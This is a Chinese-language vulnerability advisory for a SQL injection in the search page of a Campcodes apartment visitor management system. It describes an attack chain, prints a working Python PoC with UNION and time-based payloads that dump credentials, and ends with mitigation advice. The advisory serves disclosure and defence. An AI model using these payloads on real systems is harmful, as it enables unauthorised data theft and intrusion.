CVE-2025-11349：Campcodes在线公寓访客管理系统SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-11349

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Campcodes Online Apartment Visitor Management System

漏洞概述

CVE-2025-11349是Campcodes公司开发的在线公寓访客管理系统（Online Apartment Visitor Management System）1.0版本中存在的一个高危SQL注入漏洞。该漏洞位于系统的/search-visitor.php文件中，由于对用户输入参数searchdata缺乏充分的过滤和验证，攻击者可以通过构造恶意的SQL语句注入到数据库查询中，从而实现对后台数据库的未授权访问和操作。

该漏洞的CVSS 3.1评分为7.3，属于高危级别。攻击者无需任何认证即可通过网络远程发起攻击，无需用户交互。漏洞的成功利用可能导致数据库信息泄露、数据篡改以及潜在的权限提升等安全问题。

Campcodes在线公寓访客管理系统是一款用于管理公寓访客记录的Web应用程序，广泛应用于住宅小区、公寓楼等场所的访客登记和管理。该系统的SQL注入漏洞一旦被恶意利用，不仅会泄露访客的敏感个人信息（如姓名、身份证号、联系方式等），还可能被用于进一步的攻击活动，如获取管理员凭据、植入后门或进行数据勒索。由于该漏洞的利用代码已公开，攻击者可以轻易获取并利用此漏洞进行大规模攻击，对受影响系统构成严重威胁。

技术细节

该SQL注入漏洞存在于Campcodes在线公寓访客管理系统1.0版本的/search-visitor.php文件中。具体技术细节如下：

1. **漏洞位置**：/search-visitor.php文件中的searchdata参数

2. **漏洞原理**：系统在处理用户搜索请求时，未对searchdata参数进行充分的输入验证和参数化处理，而是直接将用户输入拼接到SQL查询语句中执行。这使得攻击者可以通过构造特殊的SQL注入payload，改变原始查询的语义，执行任意SQL语句。

3. **利用方式**：
- 攻击者通过HTTP GET或POST请求向/search-visitor.php端点发送包含恶意SQL代码的searchdata参数
- 由于缺乏输入过滤，恶意SQL代码会被直接拼接到后端数据库查询中
- 攻击者可以利用UNION查询、布尔盲注、时间盲注等多种SQL注入技术提取数据库中的敏感信息
- 在某些情况下，攻击者还可以利用SQL注入执行系统命令（如通过MySQL的INTO OUTFILE写入Webshell）

4. **攻击特征**：
- 攻击向量为网络（AV:N），攻击复杂度低（AC:L）
- 无需特权（PR:N）和用户交互（UI:N）
- 可导致机密性、完整性、可用性的低程度影响

5. **公开利用**：该漏洞的PoC代码已在GitHub等公开平台上发布，攻击者可以直接获取并使用，增加了漏洞被大规模利用的风险。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过搜索引擎或Shodan等工具识别暴露在互联网上的Campcodes在线公寓访客管理系统，确定目标系统的版本和部署情况。

STEP 2

步骤2：漏洞探测

攻击者访问目标系统的/search-visitor.php端点，通过在searchdata参数中注入测试payload（如单引号、OR条件等），检测系统是否存在SQL注入漏洞。

STEP 3

步骤3：漏洞确认

通过观察响应内容的变化或使用时间延迟技术（如SLEEP函数），攻击者确认SQL注入漏洞的存在并判断数据库类型（通常是MySQL）。

STEP 4

步骤4：数据提取

利用UNION联合查询或布尔盲注技术，攻击者提取数据库中的敏感信息，包括管理员凭据、访客个人信息、系统配置等。

STEP 5

步骤5：权限提升与持久化

攻击者利用获取的管理员凭据登录系统后台，或通过SQL注入写入Webshell，实现对系统的持久控制。

STEP 6

步骤6：数据泄露或破坏

攻击者窃取访客敏感数据用于身份盗用或出售，或恶意篡改、删除系统数据，造成业务中断和数据丢失。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11349 - Campcodes Online Apartment Visitor Management System SQL Injection PoC
# Vulnerability: SQL Injection in /search-visitor.php via 'searchdata' parameter
# Author: arpcyber040

import requests
import sys

TARGET_URL = "http://target.com/search-visitor.php"

def check_sql_injection(url):
    """Check if the target is vulnerable to SQL injection"""
    # Test payload for boolean-based SQL injection
    payload = "' OR '1'='1"
    params = {"searchdata": payload}
    
    try:
        response = requests.get(url, params=params, timeout=10)
        if response.status_code == 200:
            # Check if response contains visitor data (indicates injection worked)
            if "visitor" in response.text.lower() or "name" in response.text.lower():
                print(f"[+] Target appears vulnerable: {url}")
                return True
        return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

def exploit_sql_injection(url):
    """Exploit SQL injection to extract database information"""
    # Extract database version using UNION-based injection
    payloads = [
        # Basic test
        "' OR '1'='1' -- ",
        # UNION-based injection to extract database name
        "' UNION SELECT 1,2,3,database(),5,6,7,8,9,10-- ",
        # Extract table names
        "' UNION SELECT 1,2,group_concat(table_name),4,5,6,7,8,9,10 FROM information_schema.tables WHERE table_schema=database()-- ",
        # Extract user credentials
        "' UNION SELECT 1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10 FROM users-- ",
        # Time-based blind injection test
        "' OR IF(1=1, SLEEP(5), 0)-- "
    ]
    
    for i, payload in enumerate(payloads):
        try:
            params = {"searchdata": payload}
            response = requests.get(url, params=params, timeout=30)
            print(f"[*] Payload {i+1} response length: {len(response.text)}")
            if i == 4:
                # Check for time-based injection
                import time
                start = time.time()
                requests.get(url, params=params, timeout=30)
                elapsed = time.time() - start
                if elapsed > 4:
                    print(f"[+] Time-based SQL injection confirmed (delay: {elapsed:.2f}s)")
        except Exception as e:
            print(f"[-] Payload {i+1} failed: {e}")

if __name__ == "__main__":
    if len(sys.argv) > 1:
        target = sys.argv[1]
    else:
        target = TARGET_URL
    
    print(f"[*] Testing target: {target}")
    if check_sql_injection(target):
        exploit_sql_injection(target)

影响范围

Campcodes Online Apartment Visitor Management System 1.0

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）通过Web服务器配置限制对/search-visitor.php文件的直接访问；2）部署WAF规则阻止包含SQL关键字（如UNION、SELECT、OR等）的恶意请求；3）对searchdata参数实施输入长度限制和字符过滤，仅允许字母、数字等安全字符；4）临时关闭访客搜索功能或将其替换为安全的实现方式；5）加强数据库监控，及时发现异常的查询行为；6）定期备份数据库，以便在遭受攻击时能够快速恢复数据。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11349
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11349
3 Details https://www.cvedetails.com/cve/CVE-2025-11349/
4 VulDB https://vuldb.com/cve/CVE-2025-11349
5 Link https://github.com/arpcyber040/CVE/issues/4
6 Link https://vuldb.com/?ctiid.327234
7 Link https://vuldb.com/?id.327234
8 Link https://vuldb.com/?submit.664907
9 Link https://www.campcodes.com/